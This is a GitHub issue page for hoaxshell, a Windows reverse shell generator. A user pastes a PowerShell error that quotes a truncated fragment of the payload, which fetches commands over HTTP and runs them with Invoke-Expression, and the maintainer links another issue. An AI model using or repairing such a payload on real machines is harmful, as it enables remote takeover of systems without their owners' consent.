t3l3machus / hoaxshell

A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.
BSD 2-Clause "Simplified" License
2.98k stars 473 forks source link

when i try to paste it it to power shell i get this error #31

Closed mickeymal closed 1 year ago

mickeymal commented 1 year ago

Invoke-Expression : Cannot bind argument to parameter 'Command' because it is null. At line:1 char:289 + ... rs @{"X-7f3a-d0cd"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorA ... + ~~ + CategoryInfo : InvalidData: (:) [Invoke-Expression], ParameterBindingValidationException + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.InvokeExpre ssionCommand

t3l3machus commented 1 year ago

@mickeymal read this issue --> https://github.com/t3l3machus/hoaxshell/issues/15